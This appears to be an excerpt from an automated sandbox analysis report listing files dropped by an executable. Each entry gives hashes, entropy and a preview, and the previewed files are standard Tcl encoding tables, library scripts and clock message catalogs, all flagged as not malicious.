                                                                                                                                                                                                                              Preview:# Encoding file: macJapan, multi-byte..M..003F 0 46..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..00A0FF61FF62FF63FF64FF65FF66FF67FF68FF69FF6AFF6BFF6CFF6DFF6EFF6F..FF70FF71FF72FF73FF74FF75FF76FF77FF78FF79FF7AFF7BFF7CFF7DFF7EFF7F..FF80FF81FF82FF83FF84FF85FF86FF87FF88FF89FF8AFF8BFF8CFF8DFF8EFF8F..FF90FF91FF92FF93FF94FF95FF96FF97FF98FF99FF9AFF9BFF9CFF9DFF9EFF9F..0000000000000000000
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1113
                                                                                                                                                                                                                              Entropy (8bit):3.4060725247347516
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:8THVBUlJvRj7SOVbusZhAMiZyi77qsTMVmOZmk/LYRldjBpmg4JyMWG:8TMlBVnrAMiwMmOi/LYRlTsBEXG
                                                                                                                                                                                                                              MD5:34691FADC788B85D98F63159640C7DD0
                                                                                                                                                                                                                              SHA1:C8B3D084D3E831EFF6ECEF71B2029545F214C3D4
                                                                                                                                                                                                                              SHA-256:C83D971D6BC0284EF323C197896E38C57A5FF44784E451EC2997EDA70C0DD85C
                                                                                                                                                                                                                              SHA-512:77D5676F9B7AF7FD1D612A1C426889D8F2C0191887E180B78C4AA42202928A1B3078B76BD3C5F5ABB2A5CE1AE913E3CA6EFDE0483D2A2B0EFC173EF25EAE1D67
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: macRoman, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00C400C500C700C900D100D600DC00E100E000E200E400E300E500E700E900E8..00EA00EB00ED00EC00EE00EF00F100F300F200F400F600F500FA00F900FB00FC..202000B000A200A300A7202200B600DF00AE00A9212200B400A8226000C600D8..221E00B12264226500A500B522022211220F03C0222B00AA00BA03A900E600F8..00BF00A100AC221A01922248220600AB00BB202600A000C000C300D501520153..20132014201C201D2018201900F725CA00FF0178204420AC2039203AFB01FB02..202100B7201A201E203
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1115
                                                                                                                                                                                                                              Entropy (8bit):3.412326247178521
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:8tHVBUlJvRj7SOVbusZhAMiZyi77qsTMVZ5OZwYRldj/T9g4JyMWG:8tMlBVnrAMiwMmOA7YRlFT9BEXG
                                                                                                                                                                                                                              MD5:04E25073BFB0019D8381B72F7B433F00
                                                                                                                                                                                                                              SHA1:B63B0AD9F10A44B0DDD12A3BDBCDEB2992D6D385
                                                                                                                                                                                                                              SHA-256:0B805DAF21D37D702617A8C72C7345F857695108D905FF378791F291CEA150F0
                                                                                                                                                                                                                              SHA-512:0514EC054676C15C65B01B02747CDBAD79BC89FD1A24A17797A8729752FB748FEDBE920E7BBFF41A6DA4BA99002E3B8DB674D53E30485DC36F6BF737EAF11702
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: macRomania, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00C400C500C700C900D100D600DC00E100E000E200E400E300E500E700E900E8..00EA00EB00ED00EC00EE00EF00F100F300F200F400F600F500FA00F900FB00FC..202000B000A200A300A7202200B600DF00AE00A9212200B400A822600102015E..221E00B12264226500A500B522022211220F03C0222B00AA00BA21260103015F..00BF00A100AC221A01922248220600AB00BB202600A000C000C300D501520153..20132014201C201D2018201900F725CA00FF0178204400A42039203A01620163..202100B7201A201E2
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1112
                                                                                                                                                                                                                              Entropy (8bit):3.6062142626989004
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:88HVBUlJvRj7SOVbusZhAMiZyi77qqJipJwHmEU4AyqU+TpH:88MlBVnrAMiwMmqJ8Jf4AyqUe
                                                                                                                                                                                                                              MD5:06DC6BA6E4A75CD7FF2D7A4248912C61
                                                                                                                                                                                                                              SHA1:23FB16763A8F11EF48E805E4F453C2F812D48FC4
                                                                                                                                                                                                                              SHA-256:A1802A2FEB01B255EC7C17425EEE4525372DF8CE226F4047D149172EB438F913
                                                                                                                                                                                                                              SHA-512:41A487EC5C36C17B2746C5DC770882A836E6E75CF6A14C31595EB211022F0476BD3B953497C447F21554769F127C3A56E5B6EF8FB3C20A8AFF8C67E0CC94359D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: macThai, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00AB00BB2026F88CF88FF892F895F898F88BF88EF891F894F897201C201DF899..FFFD2022F884F889F885F886F887F888F88AF88DF890F893F89620182019FFFD..00A00E010E020E030E040E050E060E070E080E090E0A0E0B0E0C0E0D0E0E0E0F..0E100E110E120E130E140E150E160E170E180E190E1A0E1B0E1C0E1D0E1E0E1F..0E200E210E220E230E240E250E260E270E280E290E2A0E2B0E2C0E2D0E2E0E2F..0E300E310E320E330E340E350E360E370E380E390E3AFEFF200B201320140E3F..0E400E410E420E430E44
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1115
                                                                                                                                                                                                                              Entropy (8bit):3.422718883614008
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:8QjHVBUlJvRj7SOVbusZhAMiZyi77qsTMVmOZmk/LYRldD8g4JyS:88MlBVnrAMiwMmOi/LYRlWBES
                                                                                                                                                                                                                              MD5:4EA94A0DB35BED2081A2CC9D627A8180
                                                                                                                                                                                                                              SHA1:AB2AC3ADA19F3F656780FF876D5B536A8DCE92C6
                                                                                                                                                                                                                              SHA-256:AFB66138EBE9B87D8B070FE3B6E7D1A05ED508571E9E5B166C3314069D59B4E4
                                                                                                                                                                                                                              SHA-512:7888F560D3728732BE1B7DCE49ECB61F3399CEF11191F4116C891E1D147B2A90ED8FB4A5E7B51904A001C47750BD9EB1B15EA5BA5B4EC5D69CDE7704B69529AD
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: macTurkish, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00C400C500C700C900D100D600DC00E100E000E200E400E300E500E700E900E8..00EA00EB00ED00EC00EE00EF00F100F300F200F400F600F500FA00F900FB00FC..202000B000A200A300A7202200B600DF00AE00A9212200B400A8226000C600D8..221E00B12264226500A500B522022211220F03C0222B00AA00BA03A900E600F8..00BF00A100AC221A01922248220600AB00BB202600A000C000C300D501520153..20132014201C201D2018201900F725CA00FF0178011E011F01300131015E015F..202100B7201A201E2
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1115
                                                                                                                                                                                                                              Entropy (8bit):3.4157626428238723
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:8TzHVBUlJvRj7SOVbusZhAMiZyi77qb+SAJlz9a4piS1yk+5yye3cJd:8PMlBVnrAMiwMm8Y6zUk+UVsJd
                                                                                                                                                                                                                              MD5:A5B48D6F2678579CBE6EA094A4655071
                                                                                                                                                                                                                              SHA1:A13A41D530B21CE8443AFD7E811286537C5BA9C7
                                                                                                                                                                                                                              SHA-256:F7E11736C9FF30102B31EC72272754110193B347433F4B364921E8F131C92BF0
                                                                                                                                                                                                                              SHA-512:612F9D528CE940B5CA9E67CB127013A104655207511F4CF39C8696A127E6A8F4867F5603DCFB78C25A55668C6EE70F2997A8D1626F6F1DD44B19260967F17097
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: macUkraine, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0410041104120413041404150416041704180419041A041B041C041D041E041F..0420042104220423042404250426042704280429042A042B042C042D042E042F..202000B0049000A300A7202200B6040600AE00A9212204020452226004030453..221E00B122642265045600B504910408040404540407045704090459040A045A..0458040500AC221A01922248220600AB00BB202600A0040B045B040C045C0455..20132014201C201D2018201900F7201E040E045E040F045F211604010451044F..04300431043204330
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):42552
                                                                                                                                                                                                                              Entropy (8bit):3.5565924983274857
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:w/RPrUHiJrwWkyY/W2wHiwWnwWOORY+gutSX:wVUid5JCurDGSX
                                                                                                                                                                                                                              MD5:EEB45AF9D7104872FE290D1EC18AB169
                                                                                                                                                                                                                              SHA1:A80CF4EA46301F0B8B4F0BC306270D7103753871
                                                                                                                                                                                                                              SHA-256:4A15ED210126BCDAE32543F60EB1A0677F985F32D49FCE923B9FAE8C5BCF3DA4
                                                                                                                                                                                                                              SHA-512:C359042B04441AA50E536B23EEA0C6C7B2C1893DFB9CDB5459D3B46945D3BB50FD7A32A4F4E26A83622E76D3D2BB0DBBC3D1F3FB87AAF40520A243165B82AB34
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: shiftjis, multi-byte..M..003F 0 40..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080000000000000000000850086008700000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000FF61FF62FF63FF64FF65FF66FF67FF68FF69FF6AFF6BFF6CFF6DFF6EFF6F..FF70FF71FF72FF73FF74FF75FF76FF77FF78FF79FF7AFF7BFF7CFF7DFF7EFF7F..FF80FF81FF82FF83FF84FF85FF86FF87FF88FF89FF8AFF8BFF8CFF8DFF8EFF8F..FF90FF91FF92FF93FF94FF95FF96FF97FF98FF99FF9AFF9BFF9CFF9DFF9EFF9F..0000000000000000000
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1111
                                                                                                                                                                                                                              Entropy (8bit):3.73983895892791
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:SdHkUlJvRjvRV7ZQsoRmSds2AsSemxUs+Jw1Viv6ObTXyn:avlJV7ZQsoRmosGSPxU/JOm6wTXyn
                                                                                                                                                                                                                              MD5:D59E748D863A5FAEF0CEEC2564E041A3
                                                                                                                                                                                                                              SHA1:4FFF3BE37F50C090FFC581F1C7769E20281E90C3
                                                                                                                                                                                                                              SHA-256:9660537A7B62996478555C6F57C1962C78FB3972F19370B2E395C44842818A1F
                                                                                                                                                                                                                              SHA-512:BF8FD0CF1CC55564C46976F53F441B26819ADBA7AB7BB04FF3FF5A313366FC3049DF29A839CCCB05EDEF4A7ECBB49FFCA62518EDA90AF2D7781874A8435073AE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: symbol, single-byte..S..003F 1 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002122000023220300250026220D002800292217002B002C2212002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..22450391039203A70394039503A603930397039903D1039A039B039C039D039F..03A0039803A103A303A403A503C203A9039E03A80396005B2234005D22A5005F..F8E503B103B203C703B403B503C603B303B703B903D503BA03BB03BC03BD03BF..03C003B803C103C303C403C503D603C903BE03C803B6007B007C007D223C007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..000003D2203222642044221E0192266326662665266021942190219121922193..00B000B12033226500D7221D2202202200F72260226122482026F8E6F8E721B5..21352111211C21182297229522052229222A2283228722842282228622082209..2220220700AE00A92122220F221A22C500AC2227222821D421D021D121D221D3..22C42329F8E8F8E9F8EA2
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1112
                                                                                                                                                                                                                              Entropy (8bit):3.0553142874336943
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:ZlHVBUlJvRj7SOVbusZhAMiZyi77qsDHmEU4AyqU+TWwdd:PMlBVnrAMiwMmss4AyqUSd
                                                                                                                                                                                                                              MD5:467A67DE6809B796B914F5BFF98EF46D
                                                                                                                                                                                                                              SHA1:C62418071A6C9CB0DCE3F67E130BFD2FB7AB0B58
                                                                                                                                                                                                                              SHA-256:50B62381D6EDD4219F4292BFDC365954491B23360DE7C08033E7218A3D29C970
                                                                                                                                                                                                                              SHA-512:BF98305AA7D759A087B9EABDC404714D8DC6B4F1BEED4ED0E1FFE646641E1AECA307673D64CF95FD09546D977B3409D6C04F56DCCA1D6332B0D9B6DD460B77A9
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: tis-620, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E0000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..00000E010E020E030E040E050E060E070E080E090E0A0E0B0E0C0E0D0E0E0E0F..0E100E110E120E130E140E150E160E170E180E190E1A0E1B0E1C0E1D0E1E0E1F..0E200E210E220E230E240E250E260E270E280E290E2A0E2B0E2C0E2D0E2E0E2F..0E300E310E320E330E340E350E360E370E380E390E3A00000000000000000E3F..0E400E410E420E430E44
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8235
                                                                                                                                                                                                                              Entropy (8bit):4.855903177272536
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:Hf8PxPu7pUHBpqyzmY5rEk/fvs+AokFlTGHts1H/tsEGZPBtsLIVn++G:H6Pu7ELJTtyli8Ozz+L
                                                                                                                                                                                                                              MD5:8609B624CD3EC63DD02DBF89455C3A9B
                                                                                                                                                                                                                              SHA1:B3E1843E34C38AA668FFDDF435A1A65D55449CA0
                                                                                                                                                                                                                              SHA-256:5123DB837EADF45712EA7D449BC40BFD3E8E16D3D71E7D0CE9A32F164973D767
                                                                                                                                                                                                                              SHA-512:B20B75473F34209888F38EE570B8A96061760E88466DFC2EC55C814968DC7F67D92D255E8635188B60455B88F2D1D517747613AD0F366D60412D2D6ECE231B0E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# history.tcl --..#..# Implementation of the history command...#..# Copyright (c) 1997 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution of..# this file, and for a DISCLAIMER OF ALL WARRANTIES...#.....# The tcl::history array holds the history list and some additional..# bookkeeping variables...#..# nextid.the index used for the next history list item...# keep..the max size of the history list..# oldest.the index of the oldest item in the history.....namespace eval ::tcl {.. variable history.. if {![info exists history]} {...array set history {... nextid.0... keep.20... oldest.-20...}.. }.... namespace ensemble create -command ::tcl::history -map {...add.::tcl::HistAdd...change.::tcl::HistChange...clear.::tcl::HistClear...event.::tcl::HistEvent...info.::tcl::HistInfo...keep.::tcl::HistKeep...nextid.::tcl::HistNextID...redo.::tcl::HistRedo.. }..}.....# history --..#..#.This is the main history command. See the
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):10066
                                                                                                                                                                                                                              Entropy (8bit):4.806771544139381
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:kipkqA3KsZMAikGJ4kIWPa95KTBoF7dg/8YNkgQ4id:TkqWKsZ8kGJ4kIWPaDFzTd
                                                                                                                                                                                                                              MD5:C2092F8CA2D761DFA8C461076D956374
                                                                                                                                                                                                                              SHA1:90B4648B3BC81C30465B0BE83A5DB4127A1392FB
                                                                                                                                                                                                                              SHA-256:8C474095A3ABA7DF5B488F3D35240D6DE729E57153980C2A898728B8C407A727
                                                                                                                                                                                                                              SHA-512:09CE408886E2CEADDF70786A15D63AF9A930E70CAC4286AC9DDD2094C8EDCF97A2ADC2D3D2659B123F88719340D3B00D9F96E9BC7C8B55192735C290E7D24683
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# http.tcl..# Client-side HTTP for GET, POST, and HEAD commands...# These routines can be used in untrusted code that uses the Safesock..# security policy...# These procedures use a callback interface to avoid using vwait,..# which is not defined in the safe base...#..# See the http.n man page for documentation....package provide http 1.0....array set http {.. -accept */*.. -proxyhost {}.. -proxyport {}.. -useragent {Tcl http client package 1.0}.. -proxyfilter httpProxyRequired..}..proc http_config {args} {.. global http.. set options [lsort [array names http -*]].. set usage [join $options ", "].. if {[llength $args] == 0} {...set result {}...foreach name $options {... lappend result $name $http($name)...}...return $result.. }.. regsub -all -- - $options {} options.. set pat ^-([join $options |])$.. if {[llength $args] == 1} {...set flag [lindex $args 0]...if {[regexp -- $pat $flag]} {... return $http($flag)...} else {... return -code er
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):746
                                                                                                                                                                                                                              Entropy (8bit):4.711041943572035
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:jHx5XRsLzhjJS42wbGlTULuUAZb3KykszLl7+HkuRz20JSv6C3l5kMn:bHRsRJS42wbGlTUcZ+yk2Lli1z2jxXkM
                                                                                                                                                                                                                              MD5:A387908E2FE9D84704C2E47A7F6E9BC5
                                                                                                                                                                                                                              SHA1:F3C08B3540033A54A59CB3B207E351303C9E29C6
                                                                                                                                                                                                                              SHA-256:77265723959C092897C2449C5B7768CA72D0EFCD8C505BDDBB7A84F6AA401339
                                                                                                                                                                                                                              SHA-512:7AC804D23E72E40E7B5532332B4A8D8446C6447BB79B4FE32402B13836079D348998EA0659802AB0065896D4F3C06F5866C6B0D90BF448F53E803D8C243BBC63
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Tcl package index file, version 1.0..# This file is generated by the "pkg_mkIndex" command..# and sourced either when an application starts up or..# by a "package unknown" script. It invokes the..# "package ifneeded" command to set up package-related..# information so that packages will be loaded automatically..# in response to "package require" commands. When this..# script is sourced, the variable $dir must contain the..# full path name of this file's directory.....package ifneeded http 1.0 [list tclPkgSetup $dir http 1.0 {{http.tcl source {httpCopyDone httpCopyStart httpEof httpEvent httpFinish httpMapReply httpProxyRequired http_code http_config http_data http_formatQuery http_get http_reset http_size http_status http_wait}}}]..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):25633
                                                                                                                                                                                                                              Entropy (8bit):4.885492991636381
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:cXugPHudKlExBG+Xg3Qonlm6ofRRECLSQDjr5vkhzx/i:hgGdKli4eonlm6offLzehNi
                                                                                                                                                                                                                              MD5:FE92C81BB4ACDDA00761C695344D5F1E
                                                                                                                                                                                                                              SHA1:A87E1516FBD1F9751EC590273925CBC5284B16BD
                                                                                                                                                                                                                              SHA-256:7A103A85413988456C2AD615C879BBCB4D91435BCFBBE23393E0EB52B56AF6E2
                                                                                                                                                                                                                              SHA-512:C983076E420614D12AB2A7342F6F74DD5DCDAD21C7C547F660E73B74B3BE487A560ABD73213DF3F58BE3D9DBD061A12D2956CA85A58D7B9D9E40D9FA6E6C25EB
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# init.tcl --..#..# Default system startup file for Tcl-based applications. Defines..# "unknown" procedure and auto-load facilities...#..# Copyright (c) 1991-1993 The Regents of the University of California...# Copyright (c) 1994-1996 Sun Microsystems, Inc...# Copyright (c) 1998-1999 Scriptics Corporation...# Copyright (c) 2004 Kevin B. Kenny. All rights reserved...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....# This test intentionally written in pre-7.5 Tcl..if {[info commands package] == ""} {.. error "version mismatch: library\nscripts expect Tcl version 7.5b1 or later but the loaded version is\nonly [info patchlevel]"..}..package require -exact Tcl 8.6.13....# Compute the auto path to use in this interpreter...# The values on the path come from several locations:..#..# The environment variable TCLLIBPATH..#..# tcl_library, which is the directory containing this init.tcl script...# [t
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1038
                                                                                                                                                                                                                              Entropy (8bit):4.10054496357204
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:4EnLB383Hcm0hH9BncmtR7tK9dUVxMmALfpKIdzVJLd3xfjTuLM+vzkHWZ6tH9H0:4aR838HH9ekCkMmEfpK2xx2jiWZ0VbY
                                                                                                                                                                                                                              MD5:DA8BA1C3041998F5644382A329C3C867
                                                                                                                                                                                                                              SHA1:CA0BD787A51AD9EDC02EDD679EEEEB3A2932E189
                                                                                                                                                                                                                              SHA-256:A1EACA556BC0CFBD219376287C72D9DBBFAB76ECF9BF204FD02D40D341BAF7DA
                                                                                                                                                                                                                              SHA-512:4F086396405FDFE7FBDA7614D143DE9DB41F75BDBD3DB18B1EE9517C3DCCED238DD240B4B64829FD04E50F602DBF371D42A321D04C4C48E4B8B2A067CA1BAF2E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset af DAYS_OF_WEEK_ABBREV [list \.. "So"\.. "Ma"\.. "Di"\.. "Wo"\.. "Do"\.. "Vr"\.. "Sa"].. ::msgcat::mcset af DAYS_OF_WEEK_FULL [list \.. "Sondag"\.. "Maandag"\.. "Dinsdag"\.. "Woensdag"\.. "Donderdag"\.. "Vrydag"\.. "Saterdag"].. ::msgcat::mcset af MONTHS_ABBREV [list \.. "Jan"\.. "Feb"\.. "Mar"\.. "Apr"\.. "Mei"\.. "Jun"\.. "Jul"\.. "Aug"\.. "Sep"\.. "Okt"\.. "Nov"\.. "Des"\.. ""].. ::msgcat::mcset af MONTHS_FULL [list \.. "Januarie"\.. "Februarie"\.. "Maart"\.. "April"\.. "Mei"\.. "Junie"\.. "Julie"\.. "Augustus"\.. "September"\.. "Oktober"\.. "November"\.. "Desember"\.. ""].. ::msgcat::mcset af AM "VM
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):257
                                                                                                                                                                                                                              Entropy (8bit):4.925537696653838
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xouFygMouFqF3v6ay/5ouFy9+3vR6HyFvn:4EnLB383RAgeYF3v6ay/RAI3voSVn
                                                                                                                                                                                                                              MD5:1B9DCD1C6FCDDC95AE820EA8DA5E15B8
                                                                                                                                                                                                                              SHA1:E8160353FD415BAB9FD5ACCA14E087C5E6AE836E
                                                                                                                                                                                                                              SHA-256:1548988458BBF0DFCCC23B7487CEC0E9C64E4CC8E045723E50BEC37C454A8C81
                                                                                                                                                                                                                              SHA-512:532AF060B95AED5E381B161BE56BC88D91A8F3DF2ACFD835491991F99FE752ADB4A3F93AB6D4E68F7042C28A3C1DD87A6312DFD9FFFAFD6ECE3F1B76837C5B7F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
